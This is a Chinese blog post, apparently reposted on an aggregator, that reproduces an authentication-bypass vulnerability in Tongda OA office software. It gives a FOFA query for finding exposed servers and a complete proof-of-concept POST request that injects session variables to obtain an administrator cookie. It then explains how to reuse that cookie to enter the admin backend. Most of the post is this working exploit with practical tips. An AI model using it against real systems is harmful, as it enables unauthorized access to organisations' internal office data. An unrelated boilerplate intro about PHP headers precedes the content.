龙空技术网

通达OA header身份认证绕过漏洞复现

笨蛋网安仔 77

前言:

眼前朋友们对“php 获取header自定义参数”大致比较看重,朋友们都需要知道一些“php 获取header自定义参数”的相关文章。那么小编在网上搜集了一些关于“php 获取header自定义参数””的相关资讯,希望姐妹们能喜欢,看官们一起来学习一下吧!

通达OA是中国通达公司的一套协同办公自动化软件,通达OA2013,通达OA2016,通达OA2017 存在身份认证绕过漏洞,攻击者可以利用漏洞生成cookie,实现未授权访问。

1.漏洞级别

高危

2.漏洞搜索

fofatitle="office Anywhere"如需指定版本可以搜title="office Anywhere 2013"

3.漏洞复现 3.1 获取有效cookie

poc请求:

POST /module/retrieve_pwd/header.inc.php HTTP/1.1Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedConnection: closeUpgrade-Insecure-Requests: 1Content-Length: 1024_SESSION[LOGIN_THEME]=15&_SESSION[LOGIN_USER_ID]=1&_SESSION[LOGIN_UID]=1&_SESSION[LOGIN_FUNC_STR]=1,3,42,643,644,634,4,147,148,7,8,9,10,16,11,130,5,131,132,256,229,182,183,194,637,134,37,135,136,226,253,254,255,536,24,196,105,119,80,96,97,98,114,126,179,607,539,251,127,238,128,85,86,87,88,89,137,138,222,90,91,92,152,93,94,95,118,237,108,109,110,112,51,53,54,153,217,150,239,240,218,219,43,17,18,19,15,36,70,76,77,115,116,185,235,535,59,133,64,257,2,74,12,68,66,67,13,14,40,41,44,75,27,60,61,481,482,483,484,485,486,487,488,489,490,491,492,120,494,495,496,497,498,499,500,501,502,503,505,504,26,506,507,508,515,537,122,123,124,628,125,630,631,632,633,55,514,509,29,28,129,510,511,224,39,512,513,252,230,231,232,629,233,234,461,462,463,464,465,466,467,468,469,470,471,472,473,474,475,200,202,201,203,204,205,206,207,208,209,65,187,186,188,189,190,191,606,192,193,221,550,551,73,62,63,34,532,548,640,641,642,549,601,600,602,603,604,46,21,22,227,56,30,31,33,32,605,57,609,103,146,107,197,228,58,538,151,6,534,69,71,72,223,639,

注:手动测试时,需要注意Content-Type为必须项,否则生成的cookie无效。(我在这里被坑了好久 导致一直没成功复现)

返回的Set-Cookie即为我们需要的有效cookie。

3.2 实现登录

将上一步获取的cookie设置到header中。

注: 这个参数名需要修改成Cookie 而不是Set-Cookie

直接请求后台

url/general/

即可复现成功,网页端可以将cookie手动添加进去然后访问

至此漏洞就复现完成了。

#头条首发挑战赛##网络安全##信息安全##安全漏洞##数据安全# #漏洞复现#

标签: #php 获取header自定义参数